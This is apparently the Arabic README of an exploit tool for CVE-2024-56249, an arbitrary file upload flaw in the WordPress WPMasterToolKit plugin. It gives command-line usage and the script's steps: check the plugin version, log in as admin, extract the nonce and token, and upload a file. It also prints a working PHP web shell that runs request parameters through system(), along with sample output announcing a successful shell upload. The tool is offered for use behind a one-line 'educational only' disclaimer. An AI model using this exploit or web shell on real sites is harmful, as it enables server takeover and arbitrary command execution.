
إضافة WordPress WPMasterToolKit <= 1.13.1 - ثغرة رفع ملفات تعسفية
يستغل هذا السكربت ثغرة رفع ملفات عشوائية (Arbitrary File Upload) في إضافة WPMasterToolKit الخاصة بووردبريس، مما يسمح للمهاجم برفع قشرة ويب (web shell) إلى الخادم. الثغرة موجودة في الإصدارات <= 1.13.1 من الإضافة.
لاستغلال هذه الثغرة، استخدم الأمر التالي:
python CVE-2024-56249.py -u <URL> -un <USERNAME> -p <PASSWORD> -fn <FILENAME>
-u / --url: رابط ووردبريس الهدف (مثال: http://192.168.100.74:888/wordpress)-un / --username: اسم مستخدم مدير ووردبريس-p / --password: كلمة مرور مدير ووردبريس-fp / --filepath: مسار رفع الملف (الافتراضي: wp-content/uploads/2025/03)-fn / --filename: اسم الملف المراد رفعه (الافتراضي: shell.php)يبدأ السكربت بفحص الرابط الهدف للتحقق مما إذا كان عرضة لـ CVE-2024-56249 عن طريق التحقق من إصدار إضافة WPMasterToolKit.
ثم يحاول تسجيل الدخول إلى لوحة تحكم ووردبريس باستخدام بيانات الاعتماد المقدمة.
بعد تسجيل الدخول بنجاح، يستخرج السكربت رموز الأمان اللازمة (nonce و token) المطلوبة لرفع الملف.
يقوم برفع الملف المحدد (مثل قشرة ويب) إلى الخادم الهدف باستخدام الرموز المستخرجة.
أخيرًا، يتحقق السكربت مما إذا تم رفع الملف بنجاح من خلال التحقق من إمكانية الوصول إليه عبر الرابط الهدف.
تأكد من وضع ملف القشرة (مثل shell.php) في نفس المجلد الذي يوجد به السكربت قبل تشغيله. هذا ضروري لكي يتمكن السكربت من تحديد موقع الملف ورفعه بنجاح.
shell.php)<?php
if(isset($_REQUEST['cmd'])){
$cmd = ($_REQUEST['cmd']);
system($cmd);
}
?>
python CVE-2024-56249.py -u http://target -un admin -p admin -fn shell.php
python CVE-2024-56249.py -u http://target -un admin -p admin -fn shell.php
[🔍] Detected plugin version: 1.13.1
[🔥] Target is VULNERABLE to CVE-2024-56249! Exploiting...
[🔑] Attempting to log in...
[✅] Authentication successful!
[📡] Extracting security tokens...
[✅] Extracted nonce: e4ae47c8d8
[✅] Extracted token: e4ae47c8d8
[📤] Attempting to upload shell.php to wp-content/uploads/2025/03...
[✅] Upload request sent successfully.
[🔥] Shell successfully uploaded! Access it here: http://target/wp-content/uploads/2025/03/shell.php
usage: CVE-2025-1307.py [-h] -u URL -un USERNAME -p PASSWORD [-fp FILEPATH] [-fn FILENAME]
Master Toolkit Exploit CVE-2024-56249 #by Nxploit | Khaled Alenazi
options:
-h, --help show this help message and exit
-u, --url URL Target WordPress URL (e.g., http://192.168.100.74:888/wordpress4/)
-un, --username USERNAME
WordPress admin username
-p, --password PASSWORD
WordPress admin password
-fp, --filepath FILEPATH
File upload path (default: wp-content/uploads/2025/03)
-fn, --filename FILENAME
File name to upload (default: shell.php)
هذه الأداة مخصصة للأغراض التعليمية فقط. استخدمها على مسؤوليتك الخاصة. المؤلف غير مسؤول عن أي إساءة استخدام أو ضرر ناتج عن هذه الأداة.
سكربت الاستغلال بواسطة Nxploit | Khaled Alenazi